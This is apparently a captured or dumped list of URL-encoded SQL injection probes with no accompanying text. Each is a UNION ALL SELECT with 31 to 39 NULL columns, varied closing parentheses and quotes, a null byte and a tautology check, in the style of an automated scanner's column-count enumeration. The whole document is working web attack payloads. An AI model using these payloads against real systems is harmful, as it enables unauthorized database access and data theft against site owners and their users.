1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%285422%3D5422 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287778%3D7778 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%289984%3D9984 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%281657%3D1657 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287391%3D7391 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284149%3D4149 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288260%3D8260 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287319%3D7319 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284750%3D4750 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284632%3D4632 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%289822%3D9822 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282661%3D2661 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287281%3D7281 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%285021%3D5021 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284578%3D4578 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283575%3D3575 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282180%3D2180 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%285127%3D5127 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282779%3D2779 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281645%3D1645 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%288902%3D8902 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283161%3D3161 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286339%3D6339 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%283606%3D3606 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282960%3D2960 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27xUNL%27%3D%27xUNL 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27YvII%27%3D%27YvII 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27hcND%27%3D%27hcND 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27GGOD%27%3D%27GGOD 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27Kbng%27%3D%27Kbng 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27wQtX%27%3D%27wQtX 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27iJro%27%3D%27iJro 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27blRm%27%3D%27blRm 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27nMEy%27%3D%27nMEy 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%27zQSL%27%3D%27zQSL 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%27oKjE%27%3D%27oKjE 